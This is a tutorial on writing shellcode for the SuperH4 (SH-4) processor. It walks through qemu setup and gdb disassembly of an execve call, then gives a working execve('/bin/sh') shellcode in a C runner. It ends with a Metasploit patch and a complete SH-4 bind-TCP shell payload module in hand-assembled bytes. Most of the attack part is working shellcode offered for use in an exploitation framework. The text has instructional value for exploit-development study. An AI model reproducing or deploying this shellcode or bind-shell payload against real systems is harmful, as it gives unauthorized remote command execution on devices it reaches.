# Description
A brief tutorial on SuperH4 architecture.
# Specs
SuperH Family :
http://www.renesas.com/media/products/mpumcu/superh/roadmap/shroadmap.gif
Source : http://www.renesas.com/products/mpumcu/superh/superh_landing.jsp
We will focus on the simple SH-4, also referred to as the SH7750 series. To start such an adventure we need a precise description of this subtle architecture, and after some searching we land on the SuperH7750 software reference manual (http://documentation.renesas.com/eng/products/mpumcu/rej09b0318_sh_4sm.pdf).
It contains, among other things, the opcode list for this processor! As we won't write shellcodes on a sheet of paper, the next step is to set up the whole environment. You have two possibilities here: boot your ultra rare SuperH machine, or emulate it with qemu. Let's describe the latter.
# Qemu setup
First thing that comes to mind when you have to deal with uncommon architectures : google "aurel32 #REPLACE_WITH_ARCH". This Debian developer did an awesome job by setting up debian qemu images for arm,........,sh4. So download the following files :
- http://people.debian.org/~aurel32/qemu/sh4/debian_sid_sh4_standard.qcow2
- http://people.debian.org/~aurel32/qemu/sh4/initrd.img-2.6.32-5-sh7751r
- http://people.debian.org/~aurel32/qemu/sh4/vmlinuz-2.6.32-5-sh7751r
By following the README, we launch qemu-system-sh4 with the following flags :
qemu-system-sh4 -M r2d -kernel vmlinuz-2.6.32-5-sh7751r -initrd initrd.img-2.6.32-5-sh7751r -hda debian_sid_sh4_standard.qcow2 -append "root=/dev/sda1 console=tty0 noiotrap" -net nic -net user -redir tcp:2222::22
Note that I added the TCP redirection to be able to ssh in directly. Don't forget to run "aptitude update && aptitude upgrade": this is an old release, so there will be quite a few packages to update, and unfortunately this emulated machine is slow as hell (btw you can read the full specs in the meantime :).
http://community.qnx.com/sf/wiki/do/viewPage/projects.core_os/wiki/KernelSystemCall
# Shellcoding
First step: executing "/bin/sh" from a shellcode. The architecture works essentially with registers, and the msdn documentation [1] tells us what each of them is used for :
R0 Return values
R1 Temp register
R2 Temp register
R3 Temp register
R4 First function argument
R5 Second function argument
R6 Third function argument
R7 Fourth function argument
R8 Permanent register
R9 Permanent register
R10 Permanent register
R11 Permanent register
R12 Permanent register
R13 Permanent register
R14 Default frame pointer
R15 Stack pointer
Now let's analyze how gcc compiles a simple execve code :
root@debian-sh4:~# cat execve.c
void getshell()
{
char *str = "//bin/sh";
execve(str,0,0);
}
void main()
{
getshell();
}
root@debian-sh4:~# gcc execve.c -o execve -g
We load it into our sh4 gdb :
root@debian-sh4:~# gdb -q execve
Reading symbols from /root/execve...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x004004f8 <+0>: mov.l r14,@-r15
0x004004fa <+2>: sts.l pr,@-r15
0x004004fc <+4>: mov r15,r14
0x004004fe <+6>: mov.l 0x400510 <main+24>,r1 ! 0x4004c0 <getshell>
0x00400500 <+8>: jsr @r1
0x00400502 <+10>: nop
0x00400504 <+12>: mov r14,r15
0x00400506 <+14>: lds.l @r15+,pr
0x00400508 <+16>: mov.l @r15+,r14
0x0040050a <+18>: rts
0x0040050c <+20>: nop
0x0040050e <+22>: nop
0x00400510 <+24>: .word 0x04c0
0x00400512 <+26>: .word 0x0040
End of assembler dump.
A subroutine call is done with the jsr @Rn instruction, the target address being loaded first from the constant stored right after the function (main+24). Next step, the disassembly of the "getshell" function :
(gdb) disassemble getshell
Dump of assembler code for function getshell:
0x004004c0 <+0>: mov.l r14,@-r15
0x004004c2 <+2>: sts.l pr,@-r15
0x004004c4 <+4>: add #-4,r15
0x004004c6 <+6>: mov r15,r14
0x004004c8 <+8>: mov r14,r1
0x004004ca <+10>: add #-60,r1
0x004004cc <+12>: mov.l 0x4004f0 <getshell+48>,r2 ! 0x40063c
0x004004ce <+14>: mov.l r2,@(60,r1)
0x004004d0 <+16>: mov r14,r1
0x004004d2 <+18>: add #-60,r1
0x004004d4 <+20>: mov.l @(60,r1),r1
0x004004d6 <+22>: mov r1,r4
0x004004d8 <+24>: mov #0,r5
0x004004da <+26>: mov #0,r6
0x004004dc <+28>: mov.l 0x4004f4 <getshell+52>,r1 ! 0x400378 <execve@plt>
0x004004de <+30>: jsr @r1
0x004004e0 <+32>: nop
0x004004e2 <+34>: add #4,r14
0x004004e4 <+36>: mov r14,r15
0x004004e6 <+38>: lds.l @r15+,pr
0x004004e8 <+40>: mov.l @r15+,r14
0x004004ea <+42>: rts
0x004004ec <+44>: nop
0x004004ee <+46>: nop
0x004004f0 <+48>: mov.b @(r0,r3),r6
0x004004f2 <+50>: .word 0x0040
0x004004f4 <+52>: .word 0x0378
0x004004f6 <+54>: .word 0x0040
End of assembler dump.
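The constants that gdb prints after each function (sometimes as `.word`, sometimes as a bogus instruction) are the literal pool read by the PC-relative `mov.l`. Here is a minimal sketch, in Ruby, of how to read those entries by hand on this little-endian target. The helper names are made up for the illustration, and the `disp` values are derived from the addresses in the dumps, since gdb does not show the raw opcodes.

```ruby
# Hypothetical helpers (not part of gdb or binutils) for reading an SH-4
# literal pool by hand on a little-endian target.

# Join the two 16-bit words gdb prints for a pool entry into one 32-bit value.
# The word at the lower address holds the low half.
def pool_constant(low_word, high_word)
  (high_word << 16) | low_word
end

# Address read by "mov.l @(disp,PC),Rn": the PC is rounded down to a
# multiple of 4, then 4 + disp * 4 is added (disp is the low opcode byte).
def mov_l_pc_target(pc, disp)
  (pc & ~3) + 4 + disp * 4
end

# main+24 / main+26 hold .word 0x04c0 and .word 0x0040: the address of getshell.
printf("getshell  = 0x%08x\n", pool_constant(0x04c0, 0x0040))

# getshell+48 is shown as "mov.b @(r0,r3),r6", which encodes as 0x063c,
# so together with .word 0x0040 it is the string pointer 0x40063c.
printf("string    = 0x%08x\n", pool_constant(0x063c, 0x0040))

# The mov.l at main+6 (0x4004fe) with disp = 4 reads from main+24 (0x400510).
printf("pool slot = 0x%08x\n", mov_l_pc_target(0x4004fe, 4))
```

The same reading applies to the other dumps: whenever gdb shows an odd instruction right after the final `rts` and `nop`, it is most likely data that the function loads with `mov.l`.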
Focusing on the execve call, we can see that the address of our "//bin/sh" string is loaded into r4, then 0 into r5 and r6. In our shellcode we will only use syscalls, to be as independent as possible from libraries. One step deeper, we have the execve@plt disassembly (not resolved yet) :
(gdb) disassemble execve
Dump of assembler code for function execve@plt:
0x00400378 <+0>: mov.l 0x40038c <execve@plt+20>,r0 ! 0x41076c <_GLOBAL_OFFSET_TABLE_+20>
0x0040037a <+2>: mov.l @r0,r0
0x0040037c <+4>: mov.l 0x400388 <execve@plt+16>,r1 ! 0x400324
0x0040037e <+6>: jmp @r0
0x00400380 <+8>: mov r1,r0
0x00400382 <+10>: mov.l 0x400390 <execve@plt+24>,r1 ! 0x18
0x00400384 <+12>: jmp @r0
0x00400386 <+14>: nop
0x00400388 <+16>: mov.b r2,@(r0,r3)
0x0040038a <+18>: .word 0x0040
0x0040038c <+20>: mov.b @(r0,r6),r7
0x0040038e <+22>: .word 0x0041
0x00400390 <+24>: sett
0x00400392 <+26>: .word 0x0000
End of assembler dump.
We run it once so that the symbol gets resolved :
(gdb) r
Starting program: /root/execve
Got object file from memory but can't read symbols: File format not recognized.
process 32715 is executing new program: /bin/dash
# exit
Program exited normally.
(gdb) disassemble execve
Dump of assembler code for function execve:
0x29625d40 <+0>: mov.l r12,@-r15
0x29625d42 <+2>: mova 0x29625d9c <execve+92>,r0
0x29625d44 <+4>: mov.l 0x29625d9c <execve+92>,r12 ! 0xb7a34
0x29625d46 <+6>: mov #11,r3
0x29625d48 <+8>: add r0,r12
0x29625d4a <+10>: trapa #19
0x29625d4c <+12>: or r0,r0
0x29625d4e <+14>: or r0,r0
0x29625d50 <+16>: or r0,r0
0x29625d52 <+18>: or r0,r0
0x29625d54 <+20>: or r0,r0
0x29625d56 <+22>: mov.w 0x29625d98 <execve+88>,r1 ! 0xf000
0x29625d58 <+24>: cmp/hi r1,r0
0x29625d5a <+26>: bt.s 0x29625d80 <execve+64>
0x29625d5c <+28>: mov r0,r3
0x29625d5e <+30>: rts
0x29625d60 <+32>: mov.l @r15+,r12
0x29625d62 <+34>: nop
....
0x29625d7e <+62>: nop
0x29625d80 <+64>: mov.l 0x29625d8c <execve+76>,r0 ! 0x198
0x29625d82 <+66>: stc gbr,r1
0x29625d84 <+68>: mov.l @(r0,r12),r0
0x29625d86 <+70>: bra 0x29625d90 <execve+80>
0x29625d88 <+72>: add r0,r1
0x29625d8a <+74>: nop
0x29625d8c <+76>: .word 0x0198
0x29625d8e <+78>: .word 0x0000
0x29625d90 <+80>: neg r3,r3
0x29625d92 <+82>: mov.l r3,@r1
0x29625d94 <+84>: bra 0x29625d5e <execve+30>
0x29625d96 <+86>: mov #-1,r0
0x29625d98 <+88>: fadd fr0,fr0
0x29625d9a <+90>: nop
0x29625d9c <+92>: add #52,r10
0x29625d9e <+94>: rts
End of assembler dump.
Better. This "trapa" instruction looks interesting: it is executed with 11 in r3, so let's check the execve syscall number :
root@debian-sh4:~# grep execve /usr/include/asm/unistd_32.h
#define __NR_execve 11
So r3 holds the syscall number and r4 (the first argument) still holds the string address, perfect. Instructions are pretty limited and we can only push registers onto the "stack", so pushing a single byte costs 4 bytes of code :
mov #imm, reg
mov reg,@-r15
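To see where those 4 bytes come from, here is a small sketch of an encoder for these two instructions, written in Ruby from the opcode formats of the software manual. The function names are hypothetical. Every SH-4 instruction is 16 bits wide, and `mov #imm,Rn` only has room for an 8-bit immediate, which is sign-extended.

```ruby
# Hypothetical encoders for two SH-4 instructions, written from the opcode
# formats in the SH-4 software manual; output is little-endian machine code.

# mov #imm,Rn  ->  1110 nnnn iiii iiii  (imm is a signed 8-bit value)
def enc_mov_imm(imm, rn)
  raise ArgumentError, 'immediate must fit in a signed byte' unless (-128..127).cover?(imm)
  [0xE000 | (rn << 8) | (imm & 0xFF)].pack('v')
end

# mov.l Rm,@-Rn  ->  0010 nnnn mmmm 0110  (pre-decrement Rn by 4, then store Rm)
def enc_push(rm, rn = 15)
  [0x2006 | (rn << 8) | (rm << 4)].pack('v')
end

# "Push the byte 0x2f": two 16-bit instructions, so 4 bytes of code.
code = enc_mov_imm(0x2f, 2) + enc_push(2)
puts code.unpack('C*').map { |b| format('\\x%02x', b) }.join
```

The encoder refuses anything outside -128..127 on purpose: a larger value would not fit the 8-bit field, so it has to be built in several steps.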
First thought is to build each word byte by byte in a register (the assembler gives me an error for immediates larger than 0xff, since the immediate field is only 8 bits wide) :
/*
* execve ("/bin/sh");
*
main:
add #-8, r15
mov r15, r4
mov #110, r2
shll8 r2
add #105, r2
shll8 r2
add #98, r2
shll8 r2
add #47, r2
mov.l r2, @r15
add #4, r15
xor r2, r2
shll8 r2
add #104, r2
shll8 r2
add #115, r2
shll8 r2
add #47, r2
mov.l r2, @r15
mov #11, r3
xor r5, r5
xor r6, r6
trapa #19
*/
#include <stdio.h>
#include <string.h>
char code[] =
"\xf8\x7f\xf3\x64\x6e\xe2\x18\x42\x69\x72\x18\x42\x62\x72\x18"
"\x42\x2f\x72\x22\x2f\x04\x7f\x2a\x22\x18\x42\x68\x72\x18\x42"
"\x73\x72\x18\x42\x2f\x72\x22\x2f\x0b\xe3\x5a\x25\x6a\x26\x13"
"\xc3";
int main()
{
printf("len:%zu bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
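The register arithmetic of the listing can be checked off-target. The following sketch models the "mov / shll8 / add" chain in Ruby and shows what the two `mov.l r2,@r15` stores leave in memory. The `build_word` helper is hypothetical, and the model assumes every character is below 128 so that the sign extension of `add #imm` never kicks in.

```ruby
# Hypothetical model of the "mov / shll8 / add" chain used above: start from
# the last character and shift the previous ones up, one byte at a time.
def build_word(bytes_high_to_low)
  bytes_high_to_low.reduce(0) do |reg, byte|
    ((reg << 8) + byte) & 0xFFFFFFFF # shll8 reg ; add #byte,reg
  end
end

first  = build_word([110, 105, 98, 47]) # 'n', 'i', 'b', '/'
second = build_word([0, 104, 115, 47])  # xor clears r2, then 'h', 's', '/'

# mov.l stores the register little-endian, so the low byte comes first.
stack = [first, second].pack('V2')
puts stack.inspect
```

Because the store is little-endian, the characters have to be loaded in reverse order, and the cleared top byte of the second word becomes the terminating NUL of the string.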
But it is so fat! A ninja found a better way to do it here: http://www.shell-storm.org/shellcode/files/shellcode-771.php, but this example was meant to show how to use the stack :)
# Metasploit ninja
We will add the SuperH4 architecture to metasploit :
% svn co https://www.metasploit.com/svn/framework3/trunk/
% svn diff
Index: lib/rex/constants.rb
===================================================================
--- lib/rex/constants.rb (revision 13017)
+++ lib/rex/constants.rb (working copy)
@@ -80,6 +80,9 @@
ARCH_TTY = 'tty'
ARCH_ARMLE = 'armle'
ARCH_ARMBE = 'armbe'
+ARCH_SH4 = 'sh4'
+ARCH_SH4LE = 'sh4le'
+ARCH_SH4BE = 'sh4be'
ARCH_JAVA = 'java'
ARCH_TYPES =
[
@@ -95,6 +98,9 @@
ARCH_SPARC,
ARCH_ARMLE,
ARCH_ARMBE,
+ ARCH_SH4,
+ ARCH_SH4LE,
+ ARCH_SH4BE,
ARCH_CMD,
ARCH_PHP,
ARCH_TTY,
Index: lib/rex/arch.rb
===================================================================
--- lib/rex/arch.rb (revision 13017)
+++ lib/rex/arch.rb (working copy)
@@ -63,6 +63,12 @@
[addr].pack('V')
when ARCH_ARMBE
[addr].pack('N')
+ when ARCH_SH4
+ [addr].pack('V')
+ when ARCH_SH4LE
+ [addr].pack('V')
+ when ARCH_SH4BE
+ [addr].pack('N')
end
end
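The only difference between the three new cases is the pack directive. As a quick illustration in plain Ruby (no Metasploit needed), this is what 'V' and 'N' do to an address. The address is the one of getshell from the gdb session, used here only as sample data.

```ruby
# Plain Ruby, no Metasploit needed: what the two pack directives used in the
# patch do to an address (the getshell address from the gdb session above).
addr = 0x004004c0

little = [addr].pack('V') # 32-bit little-endian, as used for sh4 / sh4le
big    = [addr].pack('N') # 32-bit big-endian, as used for sh4be

puts little.unpack('C*').map { |b| format('%02x', b) }.join(' ') # c0 04 40 00
puts big.unpack('C*').map { |b| format('%02x', b) }.join(' ')    # 00 40 04 c0
```

The patch maps plain ARCH_SH4 to the little-endian form, which matches the emulated Debian machine used throughout this tutorial.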
ARCH_SH4, ARCH_SH4BE and ARCH_SH4LE are now recognized by rex! As an example, we can create a bind shell payload as a metasploit module in modules/payloads/singles/linux/sh4/shell_bind_tcp.rb :
##
# $Id: shell_reverse_tcp.rb 12196 2011-04-01 00:51:33Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision: 1 $',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Dad`',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_SH4,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 116, 'n' ],
},
'Payload' =>
#### Tested successfully on:
# Linux debian-sh4 2.6.39-2-sh7751r
####
# s = socket(2, 1, 0)
"\x66\xe3" +# mov #102,r3
"\x02\xe4" +# mov #2,r4
"\x01\xe5" +# mov #1,r5
"\x6a\x26" +# xor r6,r6
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x01\xe4" +# mov #1,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# bind(s, {2, port, 16}, 16)
"\x03\x64" +# mov r0,r4
"\x03\x68" +# mov r0,r8
"\x2a\x22" +# xor r2,r2
"\x26\x2f" +# mov.l r2,@-r15
"\x15\xc7" +# mova 4000c8 <dup+0x18>,r0
"\x01\x62" +# mov.w @r0,r2
"\x28\x42" +# shll16 r2
"\x02\x72" +# add #2,r2
"\x26\x2f" +# mov.l r2,@-r15
"\xf3\x65" +# mov r15,r5
"\x10\xe6" +# mov #16,r6
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x02\xe4" +# mov #2,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# listen(s, 0)
"\x83\x64" +# mov r8,r4
"\x5a\x25" +# xor r5,r5
"\x6a\x26" +# xor r6,r6
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x04\xe4" +# mov #4,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# fd = accept(s, 0, 0)
"\x83\x64" +# mov r8,r4
"\x5a\x25" +# xor r5,r5
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x05\xe4" +# mov #5,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# dup2(fd, 2-1-0)
"\x03\x69" +# mov r0,r9
"\x03\xea" +# mov #3,r10
# <dup>:
"\xff\x7a" +# add #-1,r10
"\x3f\xe3" +# mov #63,r3
"\x93\x64" +# mov r9,r4
"\xa3\x65" +# mov r10,r5
"\x13\xc3" +# trapa #19
"\x15\x4a" +# cmp/pl r10
"\xf8\x89" +# bt 4000b0 <dup>
# execve(shell, 0, 0)
"\x0b\xe3" +# mov #11,r3
"\x02\xc7" +# mova 4000cc <dup+0x1c>,r0
"\x03\x64" +# mov r0,r4
"\x5a\x25" +# xor r5,r5
"\x13\xc3" +# trapa #19
"\x00\x00" +# LPORT
"\xff\xff" +# Junk
"/bin/sh" # Shell
}
))
register_options(
[
OptString.new('SHELL', [ true, "Shell to execute.", "/bin/sh" ])
], self.class)
end
def generate
p = super
sh = datastore['SHELL']
p[120, sh.length] = sh
p
end
end
This is a simple example of a bind shell with a configurable LPORT and SHELL. Both values sit at the end of the payload, at offsets 116 and 120 from its start. Note that I am using the socketcall syscall to handle the socket, bind, listen and accept calls. For each of them the arguments are pushed onto the stack in reverse order, a pointer to that location is saved in r5, the socketcall syscall number (102, loaded into r3 once before the first call) is used, and r4 selects the action that socketcall should execute. Finally, dup2 (syscall 63) is called on the three standard file descriptors in a loop that decrements r10.
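To make the LPORT handling more concrete, here is a sketch in Ruby that patches a stand-in payload and then models what the bind() code does with the port. Only the two offsets and the 'n' pack format come from the module. The `patch` and `sockaddr_head` helpers and the zero-filled template are assumptions made for the illustration, and in the real module the framework is expected to fill LPORT from the 'Offsets' entry while `generate` only handles SHELL.

```ruby
# Hypothetical stand-in for the payload tail; only the offsets (116 and 120)
# come from the module above, the leading bytes are placeholders.
LPORT_OFFSET = 116
SHELL_OFFSET = 120

def patch(template, port, shell)
  out = template.dup
  out[LPORT_OFFSET, 2] = [port].pack('n') # 'n' = 16-bit big-endian (network order)
  out[SHELL_OFFSET, shell.bytesize] = shell.b
  out
end

# What "mov.w @r0,r2 ; shll16 r2 ; add #2,r2" leaves in r2, and the bytes
# that "mov.l r2,@-r15" then writes on a little-endian SH-4.
def sockaddr_head(payload)
  half = payload[LPORT_OFFSET, 2].unpack('v').first # little-endian 16-bit load
  r2   = ((half << 16) + 2) & 0xFFFFFFFF            # shll16 drops the sign extension
  [r2].pack('V')
end

template = ("\x00" * LPORT_OFFSET + "\x00\x00\xff\xff/bin/sh").b
payload  = patch(template, 4444, '/bin/sh')
puts sockaddr_head(payload).unpack('C*').inspect
```

With port 4444 (0x115c) the four bytes on the stack are 02 00 11 5c: the family AF_INET as a little-endian 16-bit value, followed by the port in network byte order, which is the beginning of a sockaddr_in.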
The shellcode is certainly far from optimal, but this is a first approach to this exotic architecture! I don't really know how to submit modules to the metasploit framework, but if any of you knows ... :)
[1] http://msdn.microsoft.com/en-us/library/ms925519.aspx